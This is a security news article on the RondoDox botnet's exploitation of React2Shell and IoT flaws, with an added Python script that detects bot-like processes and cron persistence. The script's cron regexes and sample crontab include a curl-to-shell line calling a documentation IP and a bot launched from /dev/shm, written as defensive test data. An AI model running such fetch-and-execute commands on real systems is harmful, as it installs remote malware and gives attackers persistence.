Ongoing Campaign Targets IoT Devices via RondoDox Botnet
Cybersecurity researchers have disclosed new details of a nine-month-long campaign targeting Internet of Things (IoT) devices and a range of web applications, with the aim of recruiting them into a botnet known as RondoDox.
Exploitation of the React2Shell Vulnerability
In December 2025, CloudSEK reported that the RondoDox botnet is exploiting React2Shell (CVE-2025-55182), a critical vulnerability rated CVSS 10.0 in React Server Components (RSC) and Next.js that allows unauthenticated attackers to execute arbitrary code on affected servers.
Data from the Shadowserver Foundation shows that roughly 90,300 instances remained vulnerable as of late December 2025. About 68,400 of them are in the United States, followed by Germany (4,300), France (2,800), and India (1,500).
Expansion of RondoDox Capabilities
Since emerging in early 2025, RondoDox has broadened its reach by adding N-day vulnerabilities to its toolkit, including CVE-2023-1389 (a command-injection flaw in TP-Link Archer AX21 routers) and CVE-2025-24893 (an unauthenticated remote code execution flaw in XWiki). The use of React2Shell to spread the botnet had already been reported by Darktrace, Kaspersky, and VulnCheck.
Phases of the RondoDox Campaign
The campaign appears to have progressed through three stages before moving to exploitation of CVE-2025-55182:
- March – April 2025: Initial reconnaissance and manual vulnerability scanning.
- April – June 2025: Aggressive daily probing for vulnerabilities in widely used web applications (WordPress, Drupal, Struts2) and in IoT devices such as Wavlink routers.
- July – Early December 2025: Transition to automated, large-scale deployment, with exploitation activity occurring hourly.
Recent Attack Identifications
Attacks observed in December 2025 began with scans to identify vulnerable Next.js servers, followed by attempts to deploy a range of payloads: cryptocurrency miners, a botnet loader, and a Mirai variant.
One such loader, designated /nuts/bolts, first kills competing cryptocurrency miners and other malware before downloading the main bot binary from its command-and-control (C2) server. It removes remnants of rival botnets and Docker-based payloads, cleans up traces of earlier campaigns, and establishes persistence through cron jobs.
The bot also keeps watch over the host: it continuously scans /proc to enumerate running processes and, roughly every 45 seconds, terminates any process not on its whitelist, which prevents rival operators from reinfecting a compromised device.
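The behaviours described above (a dropped binary that runs from a scratch directory and may be deleted after launch, persistence through cron, and a loop that kills other processes) point to the host-level checks a defender can run on a Linux server. The script below is an added example written for this page; it is not RondoDox's code and not a published indicator set. The scratch-directory list, the cron regexes, and the sample process and crontab data are constructed assumptions; the deleted-executable heuristic relies on the Linux convention of appending " (deleted)" to the /proc/<pid>/exe link target when the underlying file has been unlinked.

```python
"""Heuristics for the host-level activity described in the article: a bot that
drops and runs a binary from a scratch directory (possibly unlinking it after
launch), persists via cron, and repeatedly kills competing processes.

Added illustration only; the directory list, patterns and sample data are
assumptions, not indicators published for RondoDox."""
import os
import re
from dataclasses import dataclass

# Directories from which legitimate long-running services rarely execute (assumption).
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/root/.", "/home/")

# Crontab command patterns typical of download-and-execute persistence (assumption).
CRON_PATTERNS = [
    re.compile(r"(curl|wget)\b.*\|\s*(sh|bash)\b"),  # curl ... | sh
    re.compile(r"\bchmod\s+(\+x|7[0-7]{2})\b"),       # mark a dropped file executable
    re.compile(r"(/tmp|/var/tmp|/dev/shm)/\S+"),      # run something out of a tmp dir
]


@dataclass
class Proc:
    pid: int
    cmdline: str
    exe: str  # resolved /proc/<pid>/exe target, "" if unreadable


def read_procs(proc_root="/proc"):
    """Snapshot running processes from a /proc-like tree (Linux). Reading every
    exe link generally requires root; unreadable entries are kept with exe=""."""
    procs = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        base = os.path.join(proc_root, name)
        try:
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # process exited between listdir() and open()
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            exe = ""
        procs.append(Proc(int(name), cmdline, exe))
    return procs


def suspicious_procs(procs):
    """Return (pid, cmdline, reasons) for processes whose binary was unlinked
    after launch or that execute from a scratch/user directory."""
    hits = []
    for p in procs:
        reasons = []
        if p.exe.endswith(" (deleted)"):
            reasons.append("executable deleted while running")
        if p.exe.startswith(SUSPECT_DIRS):
            reasons.append("executes from scratch directory")
        if reasons:
            hits.append((p.pid, p.cmdline, reasons))
    return hits


def suspicious_cron_lines(crontab_text):
    """Return non-comment crontab lines matching download-and-execute patterns."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if any(pat.search(s) for pat in CRON_PATTERNS):
            hits.append(s)
    return hits


# Constructed sample data for offline use; not captured from a real infection.
SAMPLE_PROCS = [
    Proc(1, "/sbin/init", "/usr/lib/systemd/systemd"),
    Proc(812, "nginx: master process", "/usr/sbin/nginx"),
    Proc(4021, "/tmp/.x/bot", "/tmp/.x/bot (deleted)"),
    Proc(4100, "node server.js", "/usr/bin/node"),
]
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.7/x.sh | sh
@reboot cd /dev/shm && chmod +x ./bot && ./bot
"""

if __name__ == "__main__":
    for pid, cmd, why in suspicious_procs(SAMPLE_PROCS):
        print(f"pid {pid}: {cmd!r} -> {', '.join(why)}")
    for line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("cron:", line)
```

On a live host, replace SAMPLE_PROCS with read_procs() and feed suspicious_cron_lines() the output of `crontab -l` for each user plus the contents of /etc/crontab and /etc/cron.d. A snapshot like this will not show the 45-second kill loop itself; catching repeated SIGKILLs of short-lived processes needs an event source such as auditd or eBPF tracing rather than a one-off /proc walk.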
Recommendations for Enhancing Cybersecurity
To defend against RondoDox, organizations are urged to update React and Next.js to patched releases without delay, segment IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor closely for suspicious process execution, and block known C2 infrastructure.
As the threat landscape continues to evolve, such proactive measures remain essential to limiting exposure and protecting networks from exploitation.